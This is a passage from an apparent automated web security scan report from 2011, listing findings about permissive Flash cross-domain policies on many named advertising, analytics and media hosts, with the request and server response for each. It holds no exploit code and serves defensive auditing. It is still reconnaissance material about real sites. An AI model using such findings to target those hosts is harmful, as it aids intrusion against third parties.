Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.56. http://pro.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pro.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pro.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.0
Date: Tue, 06 Sep 2011 15:02:07 GMT
Via: 1.1 C aicache6
Content-Length: 203
X-Aicache-OS: 216.151.182.3:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 15:03:20 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.57. http://r.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 15:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.58. http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv03.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv03.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313337982000"
Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT
host: rcv-srv03
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.59. http://receive.inplay.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313337982000"
Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT
host: rcv-srv03
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.60. http://reviews.gillettevenus.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reviews.gillettevenus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: reviews.gillettevenus.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...

4.61. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 05 Sep 2011 23:18:10 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 56400
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.62. http://search.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:53 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:42:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.63. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Tue, 13 Sep 2011 14:56:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.64. http://services.plymedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.plymedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: services.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15552000
Content-Length: 682
Content-Type: text/xml
Content-Location: http://services.plymedia.com/crossdomain.xml
Last-Modified: Sun, 12 Oct 2008 12:01:36 GMT
Accept-Ranges: bytes
ETag: "d4bdbe46622cc91:69f"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 16:12:57 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.65. http://speed.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.66. http://static.plymedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.plymedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: static.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: p2kfOzDCng+L76/JTsga//ruR9goW2HSjGFLQ4hzapeI1gDCQ+kmiJpTbuF2/Np4
x-amz-request-id: E50262CF927C8E0A
Date: Tue, 12 Jul 2011 23:33:42 GMT
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 13 May 2009 15:23:00 GMT
ETag: "60a8f758689bdda4e7f5930695eaaee5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 682
Server: AmazonS3
Age: 2242
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 123b0430d85da58b68cb675acbdd06c268df8e8fd9fca78a071b7f61da95f240a1e6cf1947de972d
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 146c5c89c7c8fdf6aead7052bd267a9d.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.67. http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.plymedia.com.s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: static.plymedia.com.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: Pd0L2ovjrp/ISSNethDM0f3pSYm1BIX6qTq2TTDXHH+SL+bp1gPlnN6PYv/OGA5v
x-amz-request-id: C468540F9D630C4D
Date: Tue, 06 Sep 2011 16:13:11 GMT
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 13 May 2009 15:23:00 GMT
ETag: "60a8f758689bdda4e7f5930695eaaee5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 682
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.68. http://stats.deloitte.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.deloitte.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:01 GMT
Server: Omniture DC/2.0.0
xserver: www88
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.69. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.70. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 14:56:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "32883cc-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

4.71. http://tf.nexac.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tf.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tf.nexac.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.72. http://ttwbs.channelintelligence.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ttwbs.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ttwbs.channelintelligence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:39 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 441
content-type: application/xml
Age: 61
Via: 1.1 iad061108 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.73. http://wingateweb.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wingateweb.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:54 GMT
Server: Omniture DC/2.0.0
xserver: www125
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.74. http://ad.wsod.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:05:46 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "447038-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

4.75. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

4.76. http://ads.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adsonar.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:44 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=896
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

4.77. http://ads1.msn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Length: 616
Content-Type: text/xml
Last-Modified: Thu, 12 May 2011 21:35:14 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Sat, 30 Jun 2012 12:49:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="global.msads.net" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.msnbc.msn.com" />
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...

4.78. http://adx.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
